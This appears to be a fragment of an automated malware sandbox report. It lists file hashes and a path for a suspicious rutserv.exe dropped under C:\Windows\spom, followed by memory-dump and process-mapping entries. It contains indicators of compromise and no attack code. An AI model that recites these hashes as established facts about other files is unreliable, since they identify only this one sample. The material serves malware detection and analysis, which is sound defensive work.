SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
memory/2152-132-0x0000000000400000-0x0000000000425000-memory.dmpFilesize
148KB
-
memory/2152-137-0x0000000000400000-0x0000000000425000-memory.dmpFilesize
148KB
-
memory/2244-144-0x0000000000000000-mapping.dmp
-
memory/2444-164-0x0000000000000000-mapping.dmp
-
memory/2584-160-0x0000000000000000-mapping.dmp
-
memory/2620-139-0x0000000000000000-mapping.dmp
-
memory/2820-143-0x0000000000000000-mapping.dmp
-
memory/2860-153-0x0000000000000000-mapping.dmp
-
memory/3096-145-0x0000000000000000-mapping.dmp
-
memory/3224-159-0x0000000000000000-mapping.dmp
-
memory/3276-146-0x0000000000000000-mapping.dmp
-
memory/3488-148-0x0000000000000000-mapping.dmp
-
memory/3532-158-0x0000000000000000-mapping.dmp
-
memory/3728-163-0x0000000000000000-mapping.dmp
-
memory/3804-162-0x0000000000000000-mapping.dmp
-
memory/3852-133-0x0000000000000000-mapping.dmp
-
memory/3856-136-0x0000000000000000-mapping.dmp
-
memory/4316-141-0x0000000000000000-mapping.dmp
-
memory/4528-142-0x0000000000000000-mapping.dmp
-
memory/4724-147-0x0000000000000000-mapping.dmp
-
memory/4776-156-0x0000000000000000-mapping.dmp
-
memory/4884-161-0x0000000000000000-mapping.dmp
-
memory/4916-165-0x0000000000000000-mapping.dmp